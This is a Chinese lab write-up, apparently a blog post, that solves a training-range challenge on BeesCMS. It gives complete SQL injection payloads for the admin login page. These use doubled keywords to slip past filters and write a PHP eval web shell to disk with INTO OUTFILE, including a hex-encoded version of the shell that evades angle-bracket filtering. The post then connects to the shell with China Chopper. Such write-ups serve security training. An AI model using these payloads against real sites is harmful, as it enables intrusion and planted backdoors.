BeesCMS系统漏洞分析溯源

靶场地址:
https://www.mozhe.cn/bug/detail/N3FvbjdsQUkza2F4b1hORGNXRVk1UT09bW96aGUmozhe

漏洞简析:因为BeesCMS后台登陆页面存在sql注入,可以被用来写入一句话木马或者查看管理员密码

绕过限制写入文件的注入代码:
1' uni union on selselectect '<?php @eval($_POST[cmd])?>',2,3,4,5 in into outoutfilefile '/var/www/html/shell.php'--%20

后台登陆页面存在于:http://219.153.49.228:43263/admin/login.php

后台登陆页面

开启Burp Suite拦截将user数据修改为1' uni union on selselectect '<?php @eval($_POST[cmd])?>',2,3,4,5 in into outoutfilefile '/var/www/html/shell.php'--%20提交,访问,

一句话木马插入失败

查看源码发现’<’和’>’被做了过滤,尝试url编码绕过失败
使用16进制绕过,将一句话木马进行16进制编码


文本转换为16进制

将一句话木马修改为16进制,同时前面加上0x,这种方法也可以用在sql注入传参时引号被限制的情况的绕过

重新拦截,修改user变量为1' uni union on selselectect 0x3c3f70687020406576616c28245f504f53545b636d645d293b3f3e,2,3,4,5 in into outoutfilefile '/var/www/html/shell2.php'--%20

发送
开启菜刀连接,获得key


获得key
©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容

  • web应用程序会对用户的输入进行验证,过滤其中的一些关键字,这种过滤我们可以试着用下面的方法避开。 1、 不使用被...
    查无此人asdasd阅读 7,367评论 0 5
  • sqlmap用户手册 说明:本文为转载,对原文中一些明显的拼写错误进行修正,并标注对自己有用的信息。 ======...
    wind_飘阅读 2,098评论 0 5
  • http://192.168.136.131/sqlmap/mysql/get_int.php?id=1 当给sq...
    xuningbo阅读 10,428评论 2 22
  • 一套实用的渗透测试岗位面试题,你会吗? 1.拿到一个待检测的站,你觉得应该先做什么? 收集信息 whois、网站源...
    g0阅读 4,882评论 0 9
  • MSSQL 跨库查询(臭要饭的!黑夜) 榨干MS SQL最后一滴血 SQL语句参考及记录集对象详解 关于SQL S...
    碧海生曲阅读 5,672评论 0 1